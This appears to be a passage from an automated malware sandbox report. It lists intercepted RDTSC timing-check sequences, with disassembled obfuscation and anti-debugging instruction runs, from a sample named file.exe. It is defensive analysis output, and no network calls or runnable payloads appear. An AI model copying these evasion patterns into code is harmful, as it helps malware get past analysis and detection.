              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECFE5 second address: CECFF7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F11A0CA928Ch 0x00000008 jne 00007F11A0CA9286h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECFF7 second address: CECFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED13D second address: CED147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED426 second address: CED44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A0C2C890h 0x00000009 jmp 00007F11A0C2C891h 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF13A6 second address: CF13B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jns 00007F11A11FDA66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF14E3 second address: CF152E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F11A0E03027h 0x00000010 mov eax, dword ptr [eax] 0x00000012 js 00007F11A0E0302Dh 0x00000018 pushad 0x00000019 jl 00007F11A0E03016h 0x0000001f jmp 00007F11A0E0301Fh 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF152E second address: CF1534 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF303F second address: CF3068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F11A0E0301Eh 0x00000008 jmp 00007F11A0E03021h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5FE7 second address: CB5FEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5FEB second address: CB5FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F11A0E0301Ch 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5FFF second address: CB6020 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F11A11FDA74h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6020 second address: CB6025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6025 second address: CB6039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A11FDA70h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6039 second address: CB604F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F11A0E0301Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB604F second address: CB6053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6053 second address: CB6057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8542 second address: CF8555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A11FDA6Eh 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8555 second address: CF855A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF889F second address: CF88B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ebx 0x00000009 pop esi 0x0000000a push esi 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F11A11FDA66h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8A38 second address: CF8A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8A46 second address: CF8A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A11FDA78h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8A62 second address: CF8A7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A0E03027h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8A7D second address: CF8A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F11A11FDA68h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAEB0 second address: CFAF27 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F11A0E03026h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edx 0x00000014 jmp 00007F11A0E03027h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F11A0E03018h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 clc 0x00000036 sub dword ptr [ebp+122D1801h], ecx 0x0000003c sbb esi, 24C7BCF8h 0x00000042 call 00007F11A0E03019h 0x00000047 push ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAF27 second address: CFAF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAF2B second address: CFAF60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007F11A0E03020h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 jmp 00007F11A0E03025h 0x00000019 pop esi 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFAF60 second address: CFAF89 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F11A11FDA6Ch 0x00000008 jc 00007F11A11FDA66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F11A11FDA75h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB35F second address: CFB363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB363 second address: CFB369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB4CE second address: CFB4E4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F11A0E0301Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB4E4 second address: CFB4E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB5B0 second address: CFB5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB5B6 second address: CFB5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFBB26 second address: CFBB30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F11A0E03016h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFBB30 second address: CFBB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFBDD9 second address: CFBDFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A0E03023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d jng 00007F11A0E03016h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC04F second address: CFC087 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F11A11FDA74h 0x00000008 jmp 00007F11A11FDA6Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 mov edi, dword ptr [ebp+122D3789h] 0x00000018 mov edi, 0D0DF9D4h 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F11A11FDA6Bh 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push esi 0x00000028 pop esi 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC558 second address: CFC5CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F11A0E03016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F11A0E0301Ah 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F11A0E03018h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F11A0E03018h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f or di, A054h 0x00000054 xchg eax, ebx 0x00000055 jg 00007F11A0E0301Eh 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC5CC second address: CFC5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F11A11FDA6Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBE66E second address: CBE672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFFC3 second address: D0001A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+122D1BDFh], ebx 0x0000000f push edx 0x00000010 or edi, dword ptr [ebp+122D3709h] 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D1821h], esi 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F11A11FDA68h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b jne 00007F11A11FDA6Ch 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 pop edi 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0001A second address: D00020 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D00020 second address: D00025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D00025 second address: D0003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A0E0301Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02452 second address: D024A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F11A11FDA6Ch 0x0000000e pop edx 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F11A11FDA68h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1BE7h], esi 0x00000030 push 00000000h 0x00000032 adc esi, 55628D1Dh 0x00000038 push 00000000h 0x0000003a sub dword ptr [ebp+122D27E7h], esi 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push esi 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D024A6 second address: D024AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D03EA0 second address: D03EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05980 second address: D05984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D04BBD second address: D04BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D056FC second address: D05707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05984 second address: D0599D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A11FDA75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D04BC1 second address: D04BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05707 second address: D05717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F11A11FDA66h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0599D second address: D059CD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11A0E0301Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D38CDh] 0x00000011 push 00000000h 0x00000013 mov di, 6164h 0x00000017 push 00000000h 0x00000019 mov esi, edx 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007F11A0E0301Ch 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05717 second address: D0571B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06D04 second address: D06D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08250 second address: D082F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F11A11FDA74h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F11A11FDA68h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1821h], eax 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F11A11FDA68h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a push esi 0x0000004b mov dword ptr [ebp+122D326Eh], ecx 0x00000051 pop edi 0x00000052 push 00000000h 0x00000054 call 00007F11A11FDA6Ah 0x00000059 sub edi, 4E17FA29h 0x0000005f pop edi 0x00000060 xchg eax, esi 0x00000061 jne 00007F11A11FDA80h 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D082F7 second address: D08301 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F11A0E03016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B39C second address: D0B435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11A11FDA77h 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c jmp 00007F11A11FDA75h 0x00000011 pop ebx 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F11A11FDA68h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d clc 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F11A11FDA68h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a push 00000000h 0x0000004c mov ebx, dword ptr [ebp+122D1819h] 0x00000052 push eax 0x00000053 pushad 0x00000054 jmp 00007F11A11FDA72h 0x00000059 push ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08426 second address: D084DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d jo 00007F11A0E03016h 0x00000013 pop ecx 0x00000014 jmp 00007F11A0E03029h 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F11A0E03018h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 push dword ptr fs:[00000000h] 0x0000003c js 00007F11A0E0301Ch 0x00000042 mov dword ptr [ebp+122D1BBDh], esi 0x00000048 jmp 00007F11A0E03028h 0x0000004d mov dword ptr fs:[00000000h], esp 0x00000054 mov ebx, dword ptr [ebp+122D3691h] 0x0000005a sub dword ptr [ebp+122D240Ah], edx 0x00000060 mov eax, dword ptr [ebp+122D0D5Dh] 0x00000066 push eax 0x00000067 mov dword ptr [ebp+122D1F50h], ecx 0x0000006d pop edi 0x0000006e push FFFFFFFFh 0x00000070 ja 00007F11A0E03022h 0x00000076 nop 0x00000077 jl 00007F11A0E0301Eh 0x0000007d push esi 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C43A second address: D0C43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C43E second address: D0C44B instructions: 0x00000000 rdtsc 0x00000002 je 00007F11A0E03016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C4D5 second address: D0C4D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B601 second address: D0B61C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A0E03027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0B61C second address: D0B621 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E372 second address: D0E378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C6D4 second address: D0C6D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0C6D8 second address: D0C6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10431 second address: D1043B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F11A11FDA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1241E second address: D12445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007F11A0E03034h 0x0000000e pushad 0x0000000f jmp 00007F11A0E03026h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D143AE second address: D14450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A11FDA6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c jmp 00007F11A11FDA6Ch 0x00000011 pop edi 0x00000012 ja 00007F11A11FDA76h 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F11A11FDA68h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 and ebx, dword ptr [ebp+122D35F1h] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F11A11FDA68h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 00000019h 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 jnl 00007F11A11FDA6Ch 0x0000005e mov di, ax 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push ecx 0x00000065 jnc 00007F11A11FDA66h 0x0000006b pop ecx 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12673 second address: D12678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12678 second address: D1267F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
